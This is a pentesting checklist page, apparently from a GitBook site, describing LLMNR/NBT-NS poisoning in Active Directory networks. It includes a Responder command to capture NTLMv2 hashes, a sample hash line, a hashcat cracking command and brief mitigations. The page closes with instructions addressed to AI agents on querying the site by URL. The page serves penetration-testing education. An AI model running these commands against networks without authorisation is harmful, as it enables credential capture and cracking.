# LLMNR Poisoning Attack

### Overview

The Link-Local Multicast Name Resolution (LLMNR) is a protocol based on the Domain Name System (DNS) packet format that allows both IPv4 and IPv6 hosts to perform name resolution for hosts on the same local link. It is able to provide a hostname-to-IP based off a multicast packet sent across the network asking all listening Network-Interfaces to reply if they are authoritatively known as the hostname in the query. 

In a network, if a machine tries to resolve a particular host and DNS fails to do so, the machine will communicate with other machines in the network using the LLMNR and ask if anyone knows the particular hosts. If LLMNR fails it goes to NBT-NS.

In Active Directory environments, we often see that LLMNR is enabled and it is used widely. But using the LLMNR host resolution has a severe security impact.

### Prerequisites for Attack

1. Attacker Must Be on the Same Local Network
2. LLMNR and/or NBT-NS Must Be Enabled
3. Victim Must Attempt to Resolve a Non-Existent Host
4. NTLM Authentication Must Be Allowed
5. SMB / HTTP / LDAP Auth Must Be Triggered. Responder only captures creds if the victim tries to authenticate to **something.**

### **Steps**

1. Start Responder. Responder now listens for LLMNR and acts as SMB, HTTP, LDAP, etc server.

   ```bash
   sudo responder -I eth0 -dwP
   ```
2. On **Windows victim**, access a **non-existent share**(Eg: \\\share1).
3. On the attacker machine, you’ll see output like:

   ```
   [SMB] NTLMv2-SSP Hash     : user::DOMAIN:112233<CHALLENGE>:AABBCC...
   ```
4. Crack the Hash.

   ```bash
   hashcat -m 5600 hashes.txt wordlist.txt
   ```

### Visual Flow

<figure><img src="/files/pvhKhCPhIXQe84JjUJ64" alt=""><figcaption><p>LLMNR Attack Flow with NTLM Authentication</p></figcaption></figure>

### Mitigations

1. Disable LLMNR and NBT-NS.
2. Use strong passwords.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/initial-attack-vectors/llmnr-poisoning-attack.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.